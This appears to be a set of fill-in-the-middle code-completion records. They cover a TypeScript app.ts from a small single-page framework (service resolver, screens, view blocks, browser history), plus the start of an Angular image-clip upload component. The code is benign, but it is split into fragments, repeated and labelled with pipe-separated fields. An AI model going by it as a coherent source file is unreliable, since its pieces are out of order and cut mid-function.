// static with<Z, A, B, C, D>(this: new (app: App, a: A, b: B, c: C, d: D) => Z, a: A, b: B, c: C, d: D): ServiceConfig;
// static with<Z, A, B, C>(this: new (app: App, a: A, b: B, c: C) => Z, a: A, b: B, c: C): ServiceConfig;
// static with<Z, A, B>(this: new (app: App, a: A, b: B) => Z, a: A, b: B): ServiceConfig;
// static with<Z, A>(this: new (app: App, a: A) => Z, a: A): ServiceConfig;
// static with(...a: any[]) {
static conf<C>(this: HasConfig<C>, config: C) {
return new ServiceConfig(this as any, config)
}
/**
* Overload this method to perform your service initiation. You can
* return a Promise to indicate that the service may initialize itself
* asynchronously -- it may for instance perform network requests.
*
* If this service used require() for another service, then init() will
* only be called once the dependencies' init() have been resolved.
*/
public init(a: any = null): any {
return null
}
/**
*
*/
public getInitPromise(deps?: any[]): Promise<any> {
let conf = this.app.resolver.configs.get(this.constructor as typeof Service)
let params = conf ? conf.params : []
if (!this._initPromise)
this._initPromise = Promise.all(deps).then(() => this.init.apply(this, params))
return Promise.resolve(this._initPromise)
}
/**
* Require another service and put it into the list of dependencies.
*/
public require<S extends Service>(p: Instantiator<S>): S {
let serv = this.app.require(p)
this._dependencies.push(serv)
return serv as S
}
public observe<T>(a: MaybeObservable<T>, cbk: ObserverFunction<T, any>): this {
let obs = o(a).createObserver(cbk)
obs.startObserving()
this.ondestroy.push(() => obs.stopObserving())
return this
}
/**
* Override this method to tell when this partial needs to be re-inited.
*/
public needsReinit(): boolean {
for (let r of this._dependencies)
if (r.needsReinit()) return true
return false
}
destroy() {
for (let d of this.ondestroy) d()
this.onDestroy()
}
/**
* Called when destroying this Service.
* It is meant to be overridden.
*/
public onDestroy() {
}
}
/**
*
*/
export class Screen {
public blocks = new Map<Block, View>()
public deps = new Set<Instantiator<Service>>()
constructor(public app: App, public name: string) {
}
include(def: Screen): Screen {
def.blocks.forEach((view, block) => {
if (!this.blocks.has(block))
// include never overwrites blocks we would already have.
this.setBlock(block, view)
})
return this
}
extend(name: string, ...views: View[]): Screen {
let s = new Screen(this.app, name)
s.include(this)
s.define(...views)
return s
}
define(...views: View[]): Screen {
views.forEach(view => this.setBlock(view.block, view))
return this
}
protected setBlock(block: Block, view: View) {
this.blocks.set(block, view)
view.deps.forEach(dep => this.deps.add(dep))
return this
}
}
/**
* A view is a render function with Service dependencies that are resolved
* every time the application changes Screen.
*/
export class View {
public app: App
public deps: Instantiator<Service>[]
public fn: (...a: Service[]) => Node
public block: Block
constructor(app: App) {
this.app = app
}
}
/**
*
*/
export type Block = {
<A extends Service, B extends Service, C extends Service, D extends Service, E extends Service, F extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, e: Instantiator<E>, f: Instantiator<F>, fn: (a: A, b: B, c: C, d: D, e: E, f: F) => Node): View;
<A extends Service, B extends Service, C extends Service, D extends Service, E extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, e: Instantiator<E>, fn: (a: A, b: B, c: C, d: D, e: E) => Node): View;
<A extends Service, B extends Service, C extends Service, D extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, fn: (a: A, b: B, c: C, d: D) => Node): View;
<A extends Service, B extends Service, C extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, fn: (a: A, b: B, c: C) => Node): View;
<A extends Service, B extends Service>(a: Instantiator<A>, b: Instantiator<B>, fn: (a: A, b: B) => Node): View;
<A extends Service>(a: Instantiator<A>, fn: (c: A) => Node): View;
(fn: () => Node): View;
app: App
_name?: string
}
/**
*
*/
export class BlockDisplayer extends VirtualHolder {
// attrs: {
// block: Block
// }
current_view: View
current_deps: Set<Service>
name = `block ${this.block._name}`
constructor(public block: Block) {
super('block')
this.observe(this.block.app.o_services, services => {
if (!app.current_screen) return
this.update(app)
})
}
update(app: App): void {
// FIXME : check if the view has had changes in services or if
// the view object has changed.
let view = app.current_screen.blocks.get(this.block)
if (!view)
return this.updateChildren(null)
let deps = view.deps.map(type => app.services.get(type))
let newdeps = new Set<Service>(deps)
let dep_changed = !this.current_deps // compute if dependency changed.
if (this.current_deps) {
for (let d of deps) {
if (!this.current_deps.has(d)) {
dep_changed = true
break
}
}
}
if (view === this.current_view && !dep_changed)
return
this.current_view = view
this.current_deps = newdeps
// Compute the new view value.
this.updateChildren(view.fn(...deps))
}
}
/**
* Display a Block into the Tree
*/
export function DisplayBlock(block: Block): Node {
var comment = document.createComment(' DisplayBlock ')
var displayer = new BlockDisplayer(block)
displayer.addToNode(comment)
return comment
}
| {
this.old_resolver.services.forEach((serv, type) => {
if (this.services.get(type) !== serv) {
serv.destroy()
}
})
} | conditional_block |
app.ts |
import {
d,
o,
MaybeObservable,
Observable,
ObserverFunction,
VirtualHolder,
NodeCreatorFn
} from 'domic'
export type Instantiator<T> = new (...a: any[]) => T
/**
*
*/
export class ServiceConfig {
service: Instantiator<Service>
params: any[] = []
constructor(service: Instantiator<Service>, ...params: any[]) {
this.service = service
this.params = params
}
}
/**
*
*/
class Redirect extends Error {
screen: Screen
configs: ServiceConfig[]
constructor(screen: Screen, configs: ServiceConfig[]) {
super('redirecting')
this.screen = screen
this.configs = configs
}
}
export type ConfigMap = Map<Instantiator<Service>, ServiceConfig>
export type ServiceMap = Map<Instantiator<Service>, Service>
/**
* Resolver helps in service instanciation and destroy
*/
export class Resolver {
services: ServiceMap
configs: ConfigMap
old_resolver: Resolver | null
app: App
constructor(app: App) {
this.app = app
}
/**
* For a given service type, return an instance, creating it
* if it doesn't exist, using a matching ServiceConfig if provided.
*
* If this is not the first time the service is instanciated, try
* to reuse a previous instance as long as its config or any of its
* dependencies have not changed.
*
* @param type: A Service type
* @returns: The matching service instance
*/
require<S extends Service>(type: Instantiator<S>): S {
let service = this.services.get(type) as S
if (service) return service
let conf = this.configs.get(type)
if (conf) {
// we ignore previous service, since we are being given a new
// configuration for it.
service = new type(this.app, ...conf.params)
} else {
// try to get an older version of the service since possibly its
// configuration has not changed.
service = this.old_resolver ? this.old_resolver.services.get(type) as S : null
conf = this.old_resolver ? this.old_resolver.configs.get(type) : null
if (service) {
// browse the dependencies and check that they haven't changed themselves.
// if require() sends a different instance of the dependency, this service
// is not reused.
for (let d of service._dependencies) {
let nd = this.require((d as any).constructor)
if (d !== nd)
service = null
}
}
if (!service) {
// no config, no previously instanciated service, so
// we just create one without arguments, reusing its config if it had one previously.
let params = conf ? conf.params : []
service = new type(this.app, ...params)
}
// pull the old configuration into the new map to keep track of it.
if (conf) this.configs.set(type, conf)
}
this.services.set(type, service)
return service
}
/**
* Destroy services that won't be used anymore by calling their destroy()
* method.
*/
commit(): void {
// Destroy old service versions.
if (this.old_resolver) {
this.old_resolver.services.forEach((serv, type) => {
if (this.services.get(type) !== serv) {
serv.destroy()
}
})
}
// free the old resolver so it can be garbage collected.
this.old_resolver = null
}
/**
* Call all the init() of the services.
*
* @returns: A promise of when the initiation will be done.
*/
init(): Promise<any> {
let promises: Promise<any>[] = []
this.services.forEach(serv => {
// Setup the promise chain ; basically, getInitPromise gets all the dependencies promises
// and will make their init() method wait on them.
promises.push(serv.getInitPromise(serv._dependencies.map(d => d.getInitPromise())))
})
return Promise.all(promises)
}
/**
* Prepare the resolver for a new transition.
*/
prepare(
screen: Screen,
old_resolver: Resolver,
configs: ServiceConfig[]
): void {
// Setup the config map
this.configs = new Map() as ConfigMap
this.services = new Map() as ServiceMap
this.old_resolver = old_resolver
configs.forEach(conf => this.configs.set(conf.service, conf))
screen.deps.forEach(dep => this.require(dep))
}
}
export type State = {screen: Screen, config: Map<Instantiator<Service>, ServiceConfig>}
/**
* Application
*/
export class App {
public activating = false
public current_screen: Screen = null
public resolver: Resolver = null
public services: Map<Instantiator<Service>, Service>
public config: Map<Instantiator<Service>, ServiceConfig>
public state_stack: State[] = []
public current_state_index: number = -1
public o_services: Observable<ServiceMap> = o(null)
constructor() {
window.addEventListener('popstate', ev => {
this.popstate(ev.state.state_index)
})
}
block(name: string): Block {
var block: Block = function _block(...a: any[]): View {
let v = new View(this)
let fn = a[a.length - 1]
let services = a.slice(0, a.length - 1)
v.fn = fn
v.deps = services
v.block = block
v.app = block.app
return v
} as Block
block.app = this
block._name = name
return block
// return new Block(this)
}
screen(name: string, ...views: View[]): Screen {
let screen = new Screen(this, name)
screen.define(...views)
return screen
}
/**
*
*/
go(screen: Screen, ...configs: ServiceConfig[]): Promise<any> {
if (this.activating)
// Should do some kind of redirect here ?
return Promise.reject(new Redirect(screen, configs))
try {
this.activating = true
let prev_resolver = this.resolver
this.resolver = new Resolver(this)
this.resolver.prepare(screen, prev_resolver, configs)
// wait on all the promises before transitionning to a new state.
return this.resolver.init().then(res => {
this.resolver.commit()
this.config = this.resolver.configs
this.services = this.resolver.services
this.current_screen = screen as Screen
this.activating = false
this.o_services.set(this.services)
// Replace state stack to remove all possible forward occurences...
// XXX : forward is bugged ?
this.state_stack = this.state_stack.slice(0, this.current_state_index + 1)
// Push
this.state_stack.push({
screen: this.current_screen,
config: this.config
})
this.current_state_index = this.state_stack.length - 1
window.history.pushState({state_index: this.state_stack.length - 1}, null)
}).catch(err => {
// cancel activation.
this.resolver = prev_resolver
this.activating = false
if (err.message === 'redirecting' && err.screen)
return this.go(err.screen, ...err.configs)
return Promise.reject(err)
})
} catch (err) {
this.activating = false
return Promise.reject(err)
}
}
async popstate(idx: number) {
if (this.state_stack.length === 0) return Promise.reject('no previous screen')
let state = this.state_stack[idx]
let configs: ServiceConfig[] = []
state.config.forEach(value => configs.push(value))
try {
await this.go(state.screen, ...configs)
} catch (e) {
console.error(e)
}
}
/**
*
*/
require<S extends Service>(type: Instantiator<S>): S {
return this.resolver.require(type)
}
}
/**
* A sample app, usable by default
*/
export const app = new App
export interface HasConfig<C> {
new (...a: any[]): InstanceHasConfig<C>
}
export interface InstanceHasConfig<C> extends Service {
init(c: C): any
}
/**
*
*/
export class Service {
app: App
ondestroy: (() => any)[] = []
_dependencies: Array<Service> = []
protected _initPromise: Promise<any>
constructor(app: App) {
this.app = app
}
// static with<Z, A, B, C, D, E, F>(this: new (app: App, a: A, b: B, c: C, d: D, e: E, f: F) => Z, a: A, b: B, c: C, d: D, e: E, f: F): ServiceConfig;
// static with<Z, A, B, C, D, E>(this: new (app: App, a: A, b: B, c: C, d: D, e: E) => Z, a: A, b: B, c: C, d: D, e: E): ServiceConfig;
// static with<Z, A, B, C, D>(this: new (app: App, a: A, b: B, c: C, d: D) => Z, a: A, b: B, c: C, d: D): ServiceConfig;
// static with<Z, A, B, C>(this: new (app: App, a: A, b: B, c: C) => Z, a: A, b: B, c: C): ServiceConfig;
// static with<Z, A, B>(this: new (app: App, a: A, b: B) => Z, a: A, b: B): ServiceConfig;
// static with<Z, A>(this: new (app: App, a: A) => Z, a: A): ServiceConfig;
// static with(...a: any[]) {
static conf<C>(this: HasConfig<C>, config: C) {
return new ServiceConfig(this as any, config)
}
/**
* Overload this method to perform your service initiation. You can
* return a Promise to indicate that the service may initialize itself
* asynchronously -- it may for instance perform network requests.
*
* If this service used require() for another service, then init() will
* only be called once the dependencies' init() have been resolved.
*/
public init(a: any = null): any {
return null
}
/**
*
*/
public getInitPromise(deps?: any[]): Promise<any> {
let conf = this.app.resolver.configs.get(this.constructor as typeof Service)
let params = conf ? conf.params : []
if (!this._initPromise)
this._initPromise = Promise.all(deps).then(() => this.init.apply(this, params))
return Promise.resolve(this._initPromise)
}
/**
* Require another service and put it into the list of dependencies.
*/
public require<S extends Service>(p: Instantiator<S>): S {
let serv = this.app.require(p)
this._dependencies.push(serv)
return serv as S
}
public observe<T>(a: MaybeObservable<T>, cbk: ObserverFunction<T, any>): this {
let obs = o(a).createObserver(cbk)
obs.startObserving()
this.ondestroy.push(() => obs.stopObserving())
return this
}
/**
* Override this method to tell when this partial needs to be re-inited.
*/
public needsReinit(): boolean {
for (let r of this._dependencies)
if (r.needsReinit()) return true
return false
}
destroy() {
for (let d of this.ondestroy) d()
this.onDestroy()
}
/**
* Called when destroying this Service.
* It is meant to be overridden.
*/
public onDestroy() {
}
}
/**
*
*/
export class Screen {
public blocks = new Map<Block, View>()
public deps = new Set<Instantiator<Service>>()
constructor(public app: App, public name: string) {
}
include(def: Screen): Screen {
def.blocks.forEach((view, block) => {
if (!this.blocks.has(block))
// include never overwrites blocks we would already have.
this.setBlock(block, view)
})
return this
}
extend(name: string, ...views: View[]): Screen {
let s = new Screen(this.app, name)
s.include(this)
s.define(...views)
return s
}
define(...views: View[]): Screen {
views.forEach(view => this.setBlock(view.block, view))
return this
}
protected setBlock(block: Block, view: View) {
this.blocks.set(block, view)
view.deps.forEach(dep => this.deps.add(dep))
return this
}
}
/**
* A view is a render function with Service dependencies that are resolved
* every time the application changes Screen.
*/
export class View {
public app: App
public deps: Instantiator<Service>[]
public fn: (...a: Service[]) => Node
public block: Block
constructor(app: App) {
this.app = app
}
}
/**
*
*/
export type Block = {
<A extends Service, B extends Service, C extends Service, D extends Service, E extends Service, F extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, e: Instantiator<E>, f: Instantiator<F>, fn: (a: A, b: B, c: C, d: D, e: E, f: F) => Node): View;
<A extends Service, B extends Service, C extends Service, D extends Service, E extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, e: Instantiator<E>, fn: (a: A, b: B, c: C, d: D, e: E) => Node): View;
<A extends Service, B extends Service, C extends Service, D extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, fn: (a: A, b: B, c: C, d: D) => Node): View;
<A extends Service, B extends Service, C extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, fn: (a: A, b: B, c: C) => Node): View;
<A extends Service, B extends Service>(a: Instantiator<A>, b: Instantiator<B>, fn: (a: A, b: B) => Node): View;
<A extends Service>(a: Instantiator<A>, fn: (c: A) => Node): View;
(fn: () => Node): View;
app: App
_name?: string
}
/**
*
*/
export class BlockDisplayer extends VirtualHolder {
// attrs: {
// block: Block
// }
current_view: View
current_deps: Set<Service>
name = `block ${this.block._name}`
constructor(public block: Block) {
super('block')
this.observe(this.block.app.o_services, services => {
if (!app.current_screen) return
this.update(app)
})
}
update(app: App): void {
// FIXME : check if the view has had changes in services or if
// the view object has changed.
let view = app.current_screen.blocks.get(this.block)
if (!view)
return this.updateChildren(null)
let deps = view.deps.map(type => app.services.get(type))
let newdeps = new Set<Service>(deps)
let dep_changed = !this.current_deps // compute if dependency changed.
if (this.current_deps) {
for (let d of deps) {
if (!this.current_deps.has(d)) {
dep_changed = true
break
}
}
}
if (view === this.current_view && !dep_changed)
return
this.current_view = view
this.current_deps = newdeps
// Compute the new view value.
this.updateChildren(view.fn(...deps))
}
}
/**
* Display a Block into the Tree
*/
export function | (block: Block): Node {
var comment = document.createComment(' DisplayBlock ')
var displayer = new BlockDisplayer(block)
displayer.addToNode(comment)
return comment
}
| DisplayBlock | identifier_name |
app.ts | import {
d,
o,
MaybeObservable,
Observable,
ObserverFunction,
VirtualHolder,
NodeCreatorFn
} from 'domic'
export type Instantiator<T> = new (...a: any[]) => T
/**
*
*/
export class ServiceConfig {
service: Instantiator<Service>
params: any[] = []
constructor(service: Instantiator<Service>, ...params: any[]) {
this.service = service
this.params = params
}
}
/**
*
*/
class Redirect extends Error {
screen: Screen
configs: ServiceConfig[]
constructor(screen: Screen, configs: ServiceConfig[]) {
super('redirecting')
this.screen = screen
this.configs = configs
}
}
export type ConfigMap = Map<Instantiator<Service>, ServiceConfig>
export type ServiceMap = Map<Instantiator<Service>, Service>
/**
* Resolver helps in service instanciation and destroy
*/
export class Resolver {
services: ServiceMap
configs: ConfigMap
old_resolver: Resolver | null
app: App
constructor(app: App) {
this.app = app
}
/**
* For a given service type, return an instance, creating it
* if it doesn't exist, using a matching ServiceConfig if provided.
*
* If this is not the first time the service is instanciated, try
* to reuse a previous instance as long as its config or any of its
* dependencies have not changed.
*
* @param type: A Service type
* @returns: The matching service instance
*/
require<S extends Service>(type: Instantiator<S>): S {
let service = this.services.get(type) as S
if (service) return service
let conf = this.configs.get(type)
if (conf) {
// we ignore previous service, since we are being given a new
// configuration for it.
service = new type(this.app, ...conf.params)
} else {
// try to get an older version of the service since possibly its
// configuration has not changed.
service = this.old_resolver ? this.old_resolver.services.get(type) as S : null
conf = this.old_resolver ? this.old_resolver.configs.get(type) : null
if (service) {
// browse the dependencies and check that they haven't changed themselves.
// if require() sends a different instance of the dependency, this service
// is not reused.
for (let d of service._dependencies) {
let nd = this.require((d as any).constructor)
if (d !== nd)
service = null
}
}
if (!service) {
// no config, no previously instanciated service, so
// we just create one without arguments, reusing its config if it had one previously.
let params = conf ? conf.params : []
service = new type(this.app, ...params)
}
// pull the old configuration into the new map to keep track of it.
if (conf) this.configs.set(type, conf)
}
this.services.set(type, service)
return service
}
/**
* Destroy services that won't be used anymore by calling their destroy()
* method.
*/
commit(): void {
// Destroy old service versions.
if (this.old_resolver) {
this.old_resolver.services.forEach((serv, type) => {
if (this.services.get(type) !== serv) {
serv.destroy()
}
})
}
// free the old resolver so it can be garbage collected.
this.old_resolver = null
}
/**
* Call all the init() of the services.
*
* @returns: A promise of when the initiation will be done.
*/
init(): Promise<any> {
let promises: Promise<any>[] = []
this.services.forEach(serv => {
// Setup the promise chain ; basically, getInitPromise gets all the dependencies promises
// and will make their init() method wait on them.
promises.push(serv.getInitPromise(serv._dependencies.map(d => d.getInitPromise())))
})
return Promise.all(promises)
}
/**
* Prepare the resolver for a new transition.
*/
prepare(
screen: Screen,
old_resolver: Resolver,
configs: ServiceConfig[]
): void {
// Setup the config map
this.configs = new Map() as ConfigMap
this.services = new Map() as ServiceMap
this.old_resolver = old_resolver
configs.forEach(conf => this.configs.set(conf.service, conf))
screen.deps.forEach(dep => this.require(dep))
}
}
export type State = {screen: Screen, config: Map<Instantiator<Service>, ServiceConfig>}
/**
* Application
*/
export class App {
public activating = false
public current_screen: Screen = null
public resolver: Resolver = null
public services: Map<Instantiator<Service>, Service>
public config: Map<Instantiator<Service>, ServiceConfig>
public state_stack: State[] = []
public current_state_index: number = -1
public o_services: Observable<ServiceMap> = o(null)
constructor() {
window.addEventListener('popstate', ev => {
this.popstate(ev.state.state_index)
})
}
block(name: string): Block {
var block: Block = function _block(...a: any[]): View {
let v = new View(this)
let fn = a[a.length - 1]
let services = a.slice(0, a.length - 1)
v.fn = fn
v.deps = services
v.block = block
v.app = block.app
return v
} as Block
block.app = this
block._name = name
return block
// return new Block(this)
}
screen(name: string, ...views: View[]): Screen {
let screen = new Screen(this, name)
screen.define(...views)
return screen
}
/**
*
*/
go(screen: Screen, ...configs: ServiceConfig[]): Promise<any> {
if (this.activating)
// Should do some kind of redirect here ?
return Promise.reject(new Redirect(screen, configs))
try {
this.activating = true
let prev_resolver = this.resolver
this.resolver = new Resolver(this)
this.resolver.prepare(screen, prev_resolver, configs)
// wait on all the promises before transitionning to a new state.
return this.resolver.init().then(res => {
this.resolver.commit()
this.config = this.resolver.configs
this.services = this.resolver.services
this.current_screen = screen as Screen
this.activating = false
this.o_services.set(this.services)
// Replace state stack to remove all possible forward occurences...
// XXX : forward is bugged ?
this.state_stack = this.state_stack.slice(0, this.current_state_index + 1)
// Push
this.state_stack.push({
screen: this.current_screen,
config: this.config
})
this.current_state_index = this.state_stack.length - 1
window.history.pushState({state_index: this.state_stack.length - 1}, null)
}).catch(err => {
// cancel activation.
this.resolver = prev_resolver
this.activating = false
if (err.message === 'redirecting' && err.screen)
return this.go(err.screen, ...err.configs)
return Promise.reject(err)
})
} catch (err) {
this.activating = false
return Promise.reject(err)
}
}
async popstate(idx: number) {
if (this.state_stack.length === 0) return Promise.reject('no previous screen')
let state = this.state_stack[idx]
let configs: ServiceConfig[] = []
state.config.forEach(value => configs.push(value))
try {
await this.go(state.screen, ...configs)
} catch (e) {
console.error(e)
}
}
/**
*
*/
require<S extends Service>(type: Instantiator<S>): S {
return this.resolver.require(type)
}
}
/**
* A sample app, usable by default
*/
export const app = new App
export interface HasConfig<C> {
new (...a: any[]): InstanceHasConfig<C>
}
export interface InstanceHasConfig<C> extends Service {
init(c: C): any
}
/**
* | ondestroy: (() => any)[] = []
_dependencies: Array<Service> = []
protected _initPromise: Promise<any>
constructor(app: App) {
this.app = app
}
// static with<Z, A, B, C, D, E, F>(this: new (app: App, a: A, b: B, c: C, d: D, e: E, f: F) => Z, a: A, b: B, c: C, d: D, e: E, f: F): ServiceConfig;
// static with<Z, A, B, C, D, E>(this: new (app: App, a: A, b: B, c: C, d: D, e: E) => Z, a: A, b: B, c: C, d: D, e: E): ServiceConfig;
// static with<Z, A, B, C, D>(this: new (app: App, a: A, b: B, c: C, d: D) => Z, a: A, b: B, c: C, d: D): ServiceConfig;
// static with<Z, A, B, C>(this: new (app: App, a: A, b: B, c: C) => Z, a: A, b: B, c: C): ServiceConfig;
// static with<Z, A, B>(this: new (app: App, a: A, b: B) => Z, a: A, b: B): ServiceConfig;
// static with<Z, A>(this: new (app: App, a: A) => Z, a: A): ServiceConfig;
// static with(...a: any[]) {
static conf<C>(this: HasConfig<C>, config: C) {
return new ServiceConfig(this as any, config)
}
/**
* Overload this method to perform your service initiation. You can
* return a Promise to indicate that the service may initialize itself
* asynchronously -- it may for instance perform network requests.
*
* If this service used require() for another service, then init() will
* only be called once the dependencies' init() have been resolved.
*/
public init(a: any = null): any {
return null
}
/**
*
*/
public getInitPromise(deps?: any[]): Promise<any> {
let conf = this.app.resolver.configs.get(this.constructor as typeof Service)
let params = conf ? conf.params : []
if (!this._initPromise)
this._initPromise = Promise.all(deps).then(() => this.init.apply(this, params))
return Promise.resolve(this._initPromise)
}
/**
* Require another service and put it into the list of dependencies.
*/
public require<S extends Service>(p: Instantiator<S>): S {
let serv = this.app.require(p)
this._dependencies.push(serv)
return serv as S
}
public observe<T>(a: MaybeObservable<T>, cbk: ObserverFunction<T, any>): this {
let obs = o(a).createObserver(cbk)
obs.startObserving()
this.ondestroy.push(() => obs.stopObserving())
return this
}
/**
* Override this method to tell when this partial needs to be re-inited.
*/
public needsReinit(): boolean {
for (let r of this._dependencies)
if (r.needsReinit()) return true
return false
}
destroy() {
for (let d of this.ondestroy) d()
this.onDestroy()
}
/**
* Called when destroying this Service.
* It is meant to be overridden.
*/
public onDestroy() {
}
}
/**
*
*/
export class Screen {
public blocks = new Map<Block, View>()
public deps = new Set<Instantiator<Service>>()
constructor(public app: App, public name: string) {
}
include(def: Screen): Screen {
def.blocks.forEach((view, block) => {
if (!this.blocks.has(block))
// include never overwrites blocks we would already have.
this.setBlock(block, view)
})
return this
}
extend(name: string, ...views: View[]): Screen {
let s = new Screen(this.app, name)
s.include(this)
s.define(...views)
return s
}
define(...views: View[]): Screen {
views.forEach(view => this.setBlock(view.block, view))
return this
}
protected setBlock(block: Block, view: View) {
this.blocks.set(block, view)
view.deps.forEach(dep => this.deps.add(dep))
return this
}
}
/**
* A view is a render function with Service dependencies that are resolved
* every time the application changes Screen.
*/
export class View {
public app: App
public deps: Instantiator<Service>[]
public fn: (...a: Service[]) => Node
public block: Block
constructor(app: App) {
this.app = app
}
}
/**
*
*/
export type Block = {
<A extends Service, B extends Service, C extends Service, D extends Service, E extends Service, F extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, e: Instantiator<E>, f: Instantiator<F>, fn: (a: A, b: B, c: C, d: D, e: E, f: F) => Node): View;
<A extends Service, B extends Service, C extends Service, D extends Service, E extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, e: Instantiator<E>, fn: (a: A, b: B, c: C, d: D, e: E) => Node): View;
<A extends Service, B extends Service, C extends Service, D extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, fn: (a: A, b: B, c: C, d: D) => Node): View;
<A extends Service, B extends Service, C extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, fn: (a: A, b: B, c: C) => Node): View;
<A extends Service, B extends Service>(a: Instantiator<A>, b: Instantiator<B>, fn: (a: A, b: B) => Node): View;
<A extends Service>(a: Instantiator<A>, fn: (c: A) => Node): View;
(fn: () => Node): View;
app: App
_name?: string
}
/**
*
*/
export class BlockDisplayer extends VirtualHolder {
// attrs: {
// block: Block
// }
current_view: View
current_deps: Set<Service>
name = `block ${this.block._name}`
constructor(public block: Block) {
super('block')
this.observe(this.block.app.o_services, services => {
if (!app.current_screen) return
this.update(app)
})
}
update(app: App): void {
// FIXME : check if the view has had changes in services or if
// the view object has changed.
let view = app.current_screen.blocks.get(this.block)
if (!view)
return this.updateChildren(null)
let deps = view.deps.map(type => app.services.get(type))
let newdeps = new Set<Service>(deps)
let dep_changed = !this.current_deps // compute if dependency changed.
if (this.current_deps) {
for (let d of deps) {
if (!this.current_deps.has(d)) {
dep_changed = true
break
}
}
}
if (view === this.current_view && !dep_changed)
return
this.current_view = view
this.current_deps = newdeps
// Compute the new view value.
this.updateChildren(view.fn(...deps))
}
}
/**
* Display a Block into the Tree
*/
export function DisplayBlock(block: Block): Node {
var comment = document.createComment(' DisplayBlock ')
var displayer = new BlockDisplayer(block)
displayer.addToNode(comment)
return comment
} | */
export class Service {
app: App | random_line_split |
image-clip.component.ts | import { ViewChild, Component, ElementRef, ChangeDetectorRef, SimpleChanges, AfterViewInit,
OnInit, OnChanges, OnDestroy, Input, Output, EventEmitter
} from '@angular/core';
import { HttpEventType } from '@angular/common/http';
import { DomSanitizer, SafeStyle } from '@angular/platform-browser';
import * as Rx from 'rxjs/Rx';
import * as lodash from 'lodash';
import * as domtoimage from 'dom-to-image';
import * as html2canvas from "html2canvas";
import { LoadingComponent } from '@app-ui/loading/loading.component';
import { ImagePath, ClipPath } from '@app/models';
import { AppService } from '@app/app.service';
import { UUID } from '@app-lib/uuid/uuid.service';
import * as imageUrl from '@app-lib/functions/image-url';
// ----------------------------------------------------------------
// Component
// ----------------------------------------------------------------
@Component({
moduleId : module.id,
selector : 'image-clip',
templateUrl: './image-clip.component.html',
styleUrls: [
'./image-clip.component.css',
]
})
export class ImageClipComponent implements OnInit, OnChanges, OnDestroy {
@Input() image: ImagePath = null;
@Output() placeOnPage = new EventEmitter<ImagePath>();
@Output() close = new EventEmitter<void>();
@ViewChild('clipbox') public _clipbox: ElementRef;
get clipboxElem(): HTMLElement { return (this._clipbox.nativeElement as HTMLElement); }
@ViewChild(LoadingComponent) loadingComponent: LoadingComponent;
@ViewChild('shadowboard') public _shadowboard: ElementRef;
@ViewChild('clipboard') public _clipboard: ElementRef;
@ViewChild('clipboardPath') public _clipboardPath: ElementRef;
@ViewChild('handles') public _handles: ElementRef;
public clipPath: ClipPath = null;
public _currentHandler: number = -1;
public _totalHandlers: number = 0;
public _loading: boolean = false;
private pWidth: number = 2.8; // (300 - 20) / 100
private pHeight: number = 2.8;
private extra: number = 1;
private subs: Rx.Subscription[] = [];
constructor(
private changeDetector: ChangeDetectorRef,
public elementRef: ElementRef,
private sanitizer: DomSanitizer,
private appService: AppService
) { }
ngOnInit() {
if (this.image)
this.setClipboxSize();
}
ngOnChanges(changes: SimpleChanges) {
if (changes['image'] && changes['image'].currentValue)
this.setClipboxSize();
}
setClipboxSize() {
if (!this.image) return;
if (this.clipPath && (this.clipPath.type == 'circle' || this.clipPath.type == 'ellipse')) {
this.pHeight = 2.8;
this.pWidth = 2.8;
}
else {
let width = 880;
let height = 480;
let img = new Image;
img.src = this.image.location + '/' + this.image.name;
let imgHeight = img.height;
let imgWidth = img.width;
if ( imgWidth > width) {
imgHeight = imgHeight * (width / imgWidth);
imgWidth = width;
}
if (imgHeight > height) {
imgWidth = imgWidth * (height / imgHeight);
imgHeight = height;
}
this.pHeight = imgHeight / 100;
this.pWidth = imgWidth / 100;
}
}
onSetCommand(event: string) {
this.changeDetector.detach();
switch (event) {
case 'PlaceOnPage':
this.onSaveImage();
break;
case 'Back':
this.close.emit();
}
}
onSaveImage() {
if (!this.image) return;
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).addClass('disable');
this.extra = 1.07142857142;
this.refreshView(true);
this.cleanBox();
setTimeout(() => {
// html2canvas(this.clipboxElem, {
// allowTaint: false,
// useCORS: true,
// logging: false,
// imageTimeout: 0,
// backgroundColor: "#FFFFFF",
// // scale: scale
// })
// .then(canvas => {
// let dataImage = canvas.toDataURL("image/jpeg", 0.92); //image/png
// // let dataImage = canvas.toDataURL('image/png'); //image/png
// let imageFile = this.appService.dataURLtoFile(
// dataImage,
// this.image.name + '_clip_' + UUID.UUID() + '.png'
// );
domtoimage.toPng(this.clipboxElem)
.then((dataURL: any) => {
const imageFile = this.appService.dataURLtoFile(dataURL, decodeURIComponent(this.image.name) + '-clip' + UUID.UUID() + '.png');
this.appService.uploadImages([imageFile]).subscribe(
event => {
switch (event.type) {
case HttpEventType.Sent:
// console.log(`Uploading file "${index}" of size ${f.size}.`);
break;
case HttpEventType.UploadProgress:
if (this.loadingComponent)
this.loadingComponent.set(Math.min(event.loaded / event.total * 100, 98));
break;
case HttpEventType.Response:
if (this.loadingComponent)
this.loadingComponent.complete();
const tuid = lodash.get(event, 'body.tuid');
const img = lodash.get(event, ['body', 'urls', 0]);
if (tuid) {
localStorage.setItem('tuid', lodash.get(event, 'body.tuid'));
}
if (img) {
this.placeOnPage.emit(img as ImagePath);
}
break;
// default:
// console.log(`File "${index}" surprising upload event: ${event.type}.`);
}
},
error => {
console.log(error);
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
